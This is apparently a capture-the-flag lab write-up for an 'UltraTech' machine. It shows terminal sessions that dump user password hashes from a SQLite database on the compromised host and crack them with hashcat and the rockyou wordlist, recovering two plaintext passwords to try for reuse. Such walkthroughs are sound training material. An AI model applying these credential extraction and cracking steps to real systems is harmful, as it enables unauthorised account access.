InfoSec LAB

UltraTech_DB

Created: 2 min read

Database

Checking the database file after performing system enumeration

www@ultratech-prod:~/api$ ll
total 80
drwxr-xr-x   3 www www  4096 Jul 22 17:05 ./
drwxr-xr-x   9 www www  4096 Jul 22 17:07 ../
-rw-r--r--   1 www www  1750 Mar 22  2019 index.js
drwxrwxr-x 163 www www  4096 Mar 22  2019 node_modules/
-rw-r--r--   1 www www   370 Mar 22  2019 package.json
-rw-r--r--   1 www www 42702 Mar 22  2019 package-lock.json
-rwxr-xr-x   1 www www   194 Jul 22 16:32 shell*
-rw-rw-r--   1 www www   103 Mar 22  2019 start.sh
-rw-r--r--   1 www www  8192 Mar 22  2019 utech.db.sqlite

It uses SQLite

www@ultratech-prod:~/api$ cat utech.db.sqlite
zz��etableusersusersCREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
���(r00tf357a0c52799563c7c7b76c1e7543a32)admin0d0ea5111e3c1def594c1684e3b9be84

The utech.db.sqlite file is in the binary format This was also partially detected by PEAS earlier

www@ultratech-prod:~/api$ strings utech.db.sqlite 
SQLite format 3
etableusersusers
CREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
        )
r00tf357a0c52799563c7c7b76c1e7543a32
admin0d0ea5111e3c1def594c1684e3b9be84

I can use strings to see it better Those are the credential hashes

Password Cracking

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ hashcat -a 0 -m 0 ./hashes /usr/share/wordlists/rockyou.txt             
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
f357a0c52799563c7c7b76c1e7543a32:n100906                  
0d0ea5111e3c1def594c1684e3b9be84:mrsheafy                 
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: ./hashes
Time.Started.....: Mon Jul 22 19:19:46 2024 (1 sec)
Time.Estimated...: Mon Jul 22 19:19:47 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4144.1 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new)
Progress.........: 5345280/14344386 (37.26%)
Rejected.........: 0/5345280 (0.00%)
Restore.Point....: 5342208/14344386 (37.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mrswhite1 -> mrsburks4
Hardware.Mon.#1..: Util: 31%
 
Started: Mon Jul 22 19:19:44 2024
Stopped: Mon Jul 22 19:19:48 2024

Password hashes cracked; r00t:n100906 admin:mrsheafy

The r00t is a system user. The password might be reused.

Interactive Graph View

Backlinks